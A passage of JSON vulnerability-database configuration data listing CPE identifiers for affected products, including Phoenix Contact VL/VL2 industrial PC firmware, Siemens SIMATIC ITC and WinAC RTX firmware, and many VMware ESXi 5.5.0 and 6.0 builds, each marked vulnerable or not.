"cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl_ppc_3000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl_ipc_p7000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl_ipc_p7000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl2_bpc_1000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl2_bpc_1000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl2_ppc_1000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl2_ppc_1000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl2_bpc_2000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl2_bpc_2000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl2_ppc_2000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl2_ppc_2000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl2_bpc_3000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl2_bpc_3000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl2_ppc_3000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl2_ppc_3000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl2_bpc_7000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl2_bpc_7000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl2_ppc_7000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl2_ppc_7000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl2_bpc_9000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl2_bpc_9000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl2_ppc_9000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl2_ppc_9000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl2_ppc7_1000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl2_ppc7_1000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl2_ppc9_1000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl2_ppc9_1000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl2_ppc12_1000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl2_ppc12_1000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:siemens:simatic_itc1500_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.1", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:siemens:simatic_itc1500:v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:siemens:simatic_itc1500_pro_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.1", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:siemens:simatic_itc1500_pro:v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:siemens:simatic_itc1900_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.1", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:siemens:simatic_itc1900:v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:siemens:simatic_itc1900_pro_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.1", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:siemens:simatic_itc1900_pro:v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:siemens:simatic_itc2200_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.1", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:siemens:simatic_itc2200:v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:siemens:simatic_itc2200_pro_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.1", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:siemens:simatic_itc2200_pro:v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:siemens:simatic_winac_rtx_\\(f\\)_2010_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2010", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:siemens:simatic_winac_rtx_\\(f\\)_2010_firmware:2010:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:siemens:simatic_winac_rtx_\\(f\\)_2010_firmware:2010:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:siemens:simatic_winac_rtx_\\(f\\)_2010_firmware:2010:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:siemens:simatic_winac_rtx_\\(f\\)_2010:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:vmware:fusion:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "8.5.9", "versionStartIncluding": "8.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:vmware:workstation:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "12.5.8", "versionStartIncluding": "12.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201312101:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201312102:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201312401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201312402:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201403101:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201403102:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201403201:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201403202:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201403203:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201403204:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201403205:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201403206:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201403207:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201403208:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201403209:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201403210:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201403211:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201404401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201404402:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201404403:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201404420:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201406401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201407101:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201407102:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201407401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201407402:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201407403:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201407404:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201407405:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201409101:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201409201:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201409202:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201409203:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201409204:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201409205:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201409206:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201409207:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201410101:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201410401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201410402:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201410403:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201410404:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201410405:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201410406:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201501101:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201501401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201501402:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201501403:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201501404:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201501405:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201502401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201504201:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201505101:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201505401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201505402:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201505403:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201505404:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509101:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509102:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509201:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509202:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509203:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509204:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509205:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509206:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509207:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509208:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509209:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509210:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509211:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509212:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509213:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201510401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201512101:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201512102:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201512401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201512402:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201512403:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201512404:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201601401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201602401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201608101:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201608102:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201608401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201608402:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201608403:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201608404:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201608405:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201609101:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201609102:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201609401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201609402:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201609403:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201612101:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201612102:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201612401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201612402:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201703401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201709101:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201709102:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201709103:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201709401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201709402:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201709403:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201504401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201505401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201507101:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201507102:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201507401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201507402:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201507403:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201507404:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201507405:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201507406:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201507407:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201509101:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201509102:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201509201:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201509202:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201509203:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201509204:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201509205:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201509206:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201509207:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201509208:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201509209:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201509210:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201510401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201511401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201601101:*:*:*:*:*:*", 